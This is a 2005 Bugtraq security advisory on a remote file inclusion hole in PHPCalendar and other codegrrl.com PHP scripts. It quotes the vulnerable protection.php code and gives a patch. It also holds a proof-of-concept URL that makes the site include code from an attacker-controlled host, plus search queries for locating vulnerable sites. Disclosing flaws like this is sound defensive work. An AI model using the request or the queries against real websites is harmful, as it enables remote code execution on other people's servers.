[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: PHPCalendar (and some more codegrrl.com products) arbitrary code
From: r.verton () gmail ! com
Date: 2005-11-13 11:51:17
Message-ID: 20051113115117.8031.qmail () securityfocus ! com
[Download RAW message or body]
PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================
Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
Severity: Arbitrary code execution
Risk: High
Author: Robin Verton <r.verton@gmail.com>
Date: Sep. 24 2005
Vendor: codegrrl.com [contacted]
Description:
Written in PHP/MySQL, PHPCalendar is a script designed especially to help webmasters \
to mantain a calendar, with all upcoming events and birthdays. It was designed to be \
used at personal sites, but it can also be very useful for fansites, to keep track of \
tours, premiers, awards shows, tv apearances, interviews, magazines features, and \
many more! You can see it in use at unfloopy.net. [http://www.codegrrl.com/]
Details:
1) protection.php (with register_globals = On)
If register_globals is on an attacker can include an arbitrary php file to \
execute malicious code.
$logout_page = "$siteurl";
[...]
if ($action == "logout")
{
Setcookie("logincookie[pwd]","",time() -86400);
Setcookie("logincookie[user]","",time() - 86400);
@include($logout_page);
exit;
}
Proof of Concept:
To exploit this vulnerability an attacker only has to use the following \
HTTP-Request: http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-code.txt
Patch:
Set register_globals in the php.ini off or disallow direct access to the \
protection.php f.e. define constants and use code like
if( !defined('IN_SYS') ) {
die('Hacking attempt');
}
to prevent the direct access
Credits:
Credit goes to Robin Verton, 15 years old from Germany
References:
[1] http://codegrrl.com
[2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about \
112,000 results]
[3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 [about \
44,000 results]
[4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 [about \
44,000 results] [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22
[6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic